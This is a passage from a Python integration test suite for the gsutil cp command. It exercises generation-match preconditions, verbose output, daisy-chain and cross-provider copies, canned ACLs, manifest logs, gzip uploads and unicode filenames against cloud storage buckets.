self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
# Specifiying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
# TODO: Add ordering assertion (should be in stderr.split('\n)[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
# Final (most recent) object should match the "Created:" URI. This is
# in second-to-last line (last line is '\n').
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28 # Up to 256 MiB in size.
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
# presereved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
# removes the x-goog-if-generation-match:0 header that was set at uploading
# time when updating the ACL.
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
# two from the upload thread (expection message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
destination objects named by the version- specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
Regions like us-east2 accept only V4 signature, hence we will create
the bucket in us-east2 region to enforce testing with V4 signature.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_copy_quiet(self):
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
Note that while this does perform a file to object upload, MD5's are
not supported for composite objects so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
# For Python 2 compatability.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
# calculate the MD5 hash. Since RunGsUtil is overriden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
# fpath_bytes = fpath.encode(UTF8)
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
# Note: We originally one time implemented a test
# (test_copy_invalid_unicode_filename) that invalid unicode filenames were
# skipped, but it turns out os.walk() on macOS doesn't have problems with
# such files (so, failed that test). Given that, we decided to remove the
# test.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
# Test that copying specifying only 2 of the 3 prefixes gzips the correct
# files, and test that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
